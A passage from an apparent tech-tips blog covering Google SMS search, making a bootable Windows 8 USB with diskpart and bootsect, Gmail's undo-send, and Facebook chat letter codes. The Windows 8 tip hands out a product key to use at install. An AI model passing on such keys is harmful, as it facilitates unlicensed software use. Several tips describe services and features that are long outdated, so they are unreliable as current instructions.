> Now look for your drive and click on Turn on Bitlocker. Windows will ask you for a password, give it one and click ‘next’ and save the password somewhere safe if you want.
Next time anyone tries to access you usb, he’d have to crack the password

Trick to Access Google Without Internet


google 300x221 Trick to Access Google Without Internet Everyone Googles, Who doesn’t? Google has became a extension of who we are. All you need to google is internet, what if i told you it’s not necessary. Yep, there is way to access internet giant without any internet connection. How? You can access google by sending SMS directly to Google’s server. You don’t even need to have a GPRS connection. Its actually a way to pass time ff you have free SMS left.
> Google SMS numbers are -> 9773300000 for India
-> 466453 for US
You can get News, Movie show times , Locations, Dictionary, Horoscope, Weather, Train timings, Flight schedules, Live scores, Local Business search, Stocks, Currency converter and lot more.
You need to send SMS in a format like shortcode queary to google number. For example if you need to get definition of word Trick. You need to send define trick. Here are some formats for a quick start.
news recession
define eat
cri Aus Ind
pnr number xxxxxxxxx
reliance stock
train avail xxxx goa to ooty on 31-03
5000 inr in usd
tarus
pizza mumbai east
movies Delhi
weather goa
1 kilo in pound

Trick to Install Windows 8 Using Usb Flash Drive


Windows 8 USB Drive 200x151 Trick to Install Windows 8 Using Usb Flash Drive Few days back Microsoft released its much hyped product Windows 8. You can install this for free and you can do this in two ways. You can either use a installer or you can download the ISO file. Unless you have a insanely high speed internet connection, your computer will literally choke during installation. So using a iso file is the best option available, by which you are supposed download the iso file and burn it to a DVD and boot from it. But why waste a DVD when you use any old >=4GB usb drive for it. There are lot of programs to do this but i’ll teach you how to do this easily without using any of them. With this tutorial you can install any OS on your PC using a USB pen drive.
> Download and install WinRAR from web. Extract the .iso file you’ve downloaded using this. Press Win+R, type cmd and press Ctrl+Shift+Enter.
> Copy Paste diskpart and hit enter. Later copy paste list volume and hit enter. Now observe the volume number of your USB drive, for the sake of tutorial lets say its 5. Also note down drive letter lets say its D.
> Now copy paste select volume 5 and hit enter. Copy paste active and enter. Again copy paste exit and enter. We’re almost Done.
> Right click on extracted iso folder, select properties and copy paste the folder location form there to command window. Press enter, copy paste cd boot and enter. And as final touch copy paste bootsect /nt60 d: where d is the drive letter of the usb it told you note down in 2nd step.
All done, you have made your usb pen drive bootable. All you have to do is copy the extracted folder contents to this usb and restart your PC and It’ll boot from the usb.
If it doesn’t use bad words for me and reboot the system and enter the BIOS mode(for this you have read the message at bottom of screen while pc starts). Change the boot priority to assign highest priority to Removable Device/USB Device. Save changes and restart again.Just in case if it asks for a key use NF32V-Q9P3W-7DR7Y-JGWRW-JFCK8.

Trick to Undo Sent Email in Gmail


E mail Marketing 200x150 Trick to Undo Sent Email in Gmail Lot of times you might think to change the contents of the email, after you hit the send button. But there are no undo buttons in case of emails. But its never too late, by using this hidden Gmail feature, you get back your sent email from your gmail account. So in case you hit the send button too soon, click undo button within 30 sec of hitting send button and you’re good to go.
> Open Gmail and click on small settings icon on top right corner.
> Select mail settings and go to Labs tab. Search for undo and check the undo send feature, Click save changes.
Next time you hit the send button you can see a undo option for 30 sec. Have Fun!!

Colourful facebook chat messages

Unlike other IM services facebook doesn’t let you send colorful texts in its chat. But recently it rolled out a option to insert profile pictures in chat window by writing its profile link. Now we’re use this feature to write a attractive colorful message. This Trick comes in handy if you want to send any special message to a special person or you want to wish someone on their birthday.
Screen shot 2012 02 16 at 1.54.18 AM e1329338514216 Trick To Send Colorful Text in Facebook Chat
 See the pic in right? to send texts like above you need to know the codes for those letters. Check below for those codes.
A [[107015582669715]]
B [[116067591741123]]
C [[115602405121532]]
D [[112542438763744]]
E [[115430438474268]]
F [[109225112442557]]
G [[111532845537326]]
H [[111356865552629]]
I [[109294689102123]]
J [[126362660720793]]
K [[116651741681944]]
L [[115807951764667]]
M [[106596672714242]]
N [[108634132504932]]
O [[116564658357124]]
P [[111669128857397]]
Q [[107061805996548]]
R [[106699962703083]]
S [[115927268419031]]
T [[112669162092780]]
U [[108983579135532]]
V [[107023745999320]]
W [[106678406038354]]
X [[116740548336581]]
Y [[112416755444217]]
Z [[165724910215]]
Make sure you have a space in between your letters. For TrickTacToe i wrote in the pic i had to use
[[112669162092780]] [[106699962703083]]] [[109294689102123]] [[115602405121532]] [[116651741681944]] [[112669162092780]] [[107015582669715]] [[115602405121532]] [[112669162092780]] [[116564658357124]] [[115430438474268]]